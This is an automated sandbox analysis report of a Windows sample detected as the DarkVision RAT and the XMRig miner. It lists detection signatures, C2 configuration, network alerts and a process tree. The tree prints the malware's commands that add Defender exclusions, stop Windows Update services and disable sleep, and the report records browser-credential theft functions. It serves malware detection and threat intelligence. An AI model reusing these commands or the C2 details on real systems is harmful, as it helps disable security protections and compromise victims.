Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1570971
MD5:05bbeba85b66e05630ab53abe2f0864e
SHA1:5181b7d8e9ec8946ad3256b1b400e2f570dae8da
SHA256:c2ee598db573b89211027b5607fb6561742991be3b9d5ed9e413a3c3d35da01b
Tags:exeuser-Bitsight
Infos:

Detection

DarkVision Rat, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Disable power options
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal saved passwords of Firefox
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain checking for user administrative privileges
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4152 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 05BBEBA85B66E05630AB53ABE2F0864E)
    • cmd.exe (PID: 2848 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1468 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • explorer.exe (PID: 5020 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
      • WindosCPUsystem.exe (PID: 2132 cmdline: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "" MD5: FD863BAB145A20D25E45177DA0E56EFC)
        • powershell.exe (PID: 7084 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2852 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 6448 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 5036 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4780 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1280 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4488 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2732 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 6636 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 2760 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 1828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7040 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 1944 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • explorer.exe (PID: 6196 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 6864 cmdline: C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0} MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1444 cmdline: C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0} MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5836 cmdline: C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0} MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: DarkVision Rat

{"C2": "185.157.162.216", "Port": 5200}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    file.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      file.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x318c0:$s1: CoGetObject
      • 0x31948:$s2: Elevation:Administrator!new:

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                Click to see the 10 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.2.explorer.exe.be0000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                  4.2.explorer.exe.be0000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    4.2.explorer.exe.be0000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x36ce8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x36c18:$s1: CoGetObject
                    • 0x36cb0:$s2: Elevation:Administrator!new:
                    0.0.file.exe.7c0000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                      0.0.file.exe.7c0000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        Click to see the 7 entries

                        Sigma Signatures

                        Change of critical system settings

                        barindex
                        Sigma detected: Disable power options
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "", ParentImage: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe, ParentProcessId: 2132, ParentProcessName: WindosCPUsystem.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6636, ProcessName: powercfg.exe

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4152, ParentProcessName: file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', ProcessId: 2848, ProcessName: cmd.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4152, ParentProcessName: file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', ProcessId: 2848, ProcessName: cmd.exe
                        Sigma detected: Remote Thread Creation By Uncommon Source Image
                        Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 5020, StartAddress: EB0000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 6864
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2848, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', ProcessId: 1468, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:07:33.500244+010020362892Crypto Currency Mining Activity Detected192.168.2.6641911.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:07:07.080523+010020283713Unknown Traffic192.168.2.649708154.216.20.243443TCP
                        2024-12-08T15:07:12.250453+010020283713Unknown Traffic192.168.2.649707154.216.20.243443TCP
                        2024-12-08T15:07:17.220795+010020283713Unknown Traffic192.168.2.649712154.216.20.243443TCP
                        2024-12-08T15:07:25.102418+010020283713Unknown Traffic192.168.2.649738154.216.20.243443TCP
                        2024-12-08T15:07:25.236284+010020283713Unknown Traffic192.168.2.649715154.216.20.243443TCP
                        2024-12-08T15:07:31.856449+010020283713Unknown Traffic192.168.2.649756154.216.20.243443TCP
                        2024-12-08T15:07:46.373548+010020283713Unknown Traffic192.168.2.649775154.216.20.243443TCP
                        2024-12-08T15:07:54.212031+010020283713Unknown Traffic192.168.2.649804154.216.20.243443TCP
                        2024-12-08T15:08:10.944741+010020283713Unknown Traffic192.168.2.649823154.216.20.243443TCP
                        2024-12-08T15:08:14.300884+010020283713Unknown Traffic192.168.2.649857154.216.20.243443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:07:32.539004+010020224821A Network Trojan was detected192.168.2.649756154.216.20.243443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:07:32.823322+010020219541A Network Trojan was detected154.216.20.243443192.168.2.649756TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:07:37.726614+010020446971A Network Trojan was detected192.168.2.649774154.216.20.243443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:07:05.208895+010020456181A Network Trojan was detected192.168.2.649709185.157.162.2165200TCP
                        2024-12-08T15:07:10.584306+010020456181A Network Trojan was detected192.168.2.649711185.157.162.2165200TCP
                        2024-12-08T15:07:13.260349+010020456181A Network Trojan was detected192.168.2.649714185.157.162.2165200TCP
                        2024-12-08T15:07:15.937042+010020456181A Network Trojan was detected192.168.2.649721185.157.162.2165200TCP
                        2024-12-08T15:07:18.615476+010020456181A Network Trojan was detected192.168.2.649728185.157.162.2165200TCP
                        2024-12-08T15:07:22.050459+010020456181A Network Trojan was detected192.168.2.649737185.157.162.2165200TCP
                        2024-12-08T15:07:25.184321+010020456181A Network Trojan was detected192.168.2.649750185.157.162.2165200TCP
                        2024-12-08T15:08:24.349906+010020456181A Network Trojan was detected192.168.2.649882185.157.162.2165200TCP
                        2024-12-08T15:08:30.530981+010020456181A Network Trojan was detected192.168.2.649894185.157.162.2165200TCP
                        2024-12-08T15:08:33.203418+010020456181A Network Trojan was detected192.168.2.649903185.157.162.2165200TCP
                        2024-12-08T15:08:35.870874+010020456181A Network Trojan was detected192.168.2.649909185.157.162.2165200TCP
                        2024-12-08T15:08:38.982183+010020456181A Network Trojan was detected192.168.2.649916185.157.162.2165200TCP
                        2024-12-08T15:08:41.654103+010020456181A Network Trojan was detected192.168.2.649922185.157.162.2165200TCP
                        2024-12-08T15:08:44.324382+010020456181A Network Trojan was detected192.168.2.649930185.157.162.2165200TCP
                        2024-12-08T15:09:48.823823+010020456181A Network Trojan was detected192.168.2.650014185.157.162.2165200TCP
                        2024-12-08T15:09:55.147311+010020456181A Network Trojan was detected192.168.2.650015185.157.162.2165200TCP
                        2024-12-08T15:09:57.816864+010020456181A Network Trojan was detected192.168.2.650016185.157.162.2165200TCP
                        2024-12-08T15:10:00.934674+010020456181A Network Trojan was detected192.168.2.650017185.157.162.2165200TCP
                        2024-12-08T15:10:03.604087+010020456181A Network Trojan was detected192.168.2.650018185.157.162.2165200TCP
                        2024-12-08T15:10:06.279386+010020456181A Network Trojan was detected192.168.2.650019185.157.162.2165200TCP
                        2024-12-08T15:10:08.950916+010020456181A Network Trojan was detected192.168.2.650020185.157.162.2165200TCP
                        2024-12-08T15:11:13.508924+010020456181A Network Trojan was detected192.168.2.650023185.157.162.2165200TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:07:08.889565+010020456191A Network Trojan was detected192.168.2.649709185.157.162.2165200TCP
                        2024-12-08T15:08:28.783097+010020456191A Network Trojan was detected192.168.2.649882185.157.162.2165200TCP
                        2024-12-08T15:09:53.265747+010020456191A Network Trojan was detected192.168.2.650014185.157.162.2165200TCP
                        2024-12-08T15:11:17.202658+010020456191A Network Trojan was detected192.168.2.650023185.157.162.2165200TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T15:09:47.046507+010020510042Crypto Currency Mining Activity Detected192.168.2.650012154.216.20.243443TCP
                        2024-12-08T15:10:42.374133+010020510042Crypto Currency Mining Activity Detected192.168.2.650021154.216.20.243443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 4.2.explorer.exe.be0000.0.unpackMalware Configuration Extractor: DarkVision Rat {"C2": "185.157.162.216", "Port": 5200}
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for sample
                        Source: file.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DC031 CryptReleaseContext,CryptDestroyHash,0_2_007DC031
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DC00C CryptReleaseContext,CryptDestroyHash,0_2_007DC00C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C5140 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,_memset,CryptBinaryToStringW,CryptBinaryToStringW,_memset,__snwprintf,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,_memset,_memset,_memset,_memset,__snwprintf,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,0_2_007C5140
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DBF00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,0_2_007DBF00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DBFD9 CryptReleaseContext,CryptDestroyHash,0_2_007DBFD9
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DBFB6 CryptReleaseContext,CryptDestroyHash,0_2_007DBFB6
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFDAD0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,4_2_00BFDAD0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE53B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,4_2_00BE53B0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFDBEE CryptReleaseContext,CryptDestroyHash,4_2_00BFDBEE
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFDBC7 CryptReleaseContext,CryptDestroyHash,4_2_00BFDBC7
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFDC2A CryptReleaseContext,CryptDestroyHash,4_2_00BFDC2A
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFDC5F CryptReleaseContext,CryptDestroyHash,4_2_00BFDC5F
                        Source: C:\Windows\explorer.exeCode function: 33_2_013952D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_013952D0
                        Source: C:\Windows\explorer.exeCode function: 33_2_013955D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,33_2_013955D0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0139A4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_0139A4A0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01396640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,33_2_01396640
                        Source: C:\Windows\explorer.exeCode function: 33_2_013949D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_013949D0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01399BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,33_2_01399BF0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01399AC0 CryptBinaryToStringW,RegGetValueW,33_2_01399AC0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01399D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,33_2_01399D30
                        Source: C:\Windows\explorer.exeCode function: 33_2_01394CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_01394CD0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01394FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_01394FD0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01396E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,33_2_01396E70
                        Source: C:\Windows\explorer.exeCode function: 33_2_0139A7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,33_2_0139A7A0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01399E27 CryptReleaseContext,CryptDestroyHash,33_2_01399E27
                        Source: C:\Windows\explorer.exeCode function: 33_2_01395E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,33_2_01395E10
                        Source: C:\Windows\explorer.exeCode function: 33_2_01393E70 CryptStringToBinaryA,33_2_01393E70
                        Source: C:\Windows\explorer.exeCode function: 33_2_01399E4E CryptReleaseContext,CryptDestroyHash,33_2_01399E4E
                        Source: C:\Windows\explorer.exeCode function: 33_2_01399EBF CryptReleaseContext,CryptDestroyHash,33_2_01399EBF
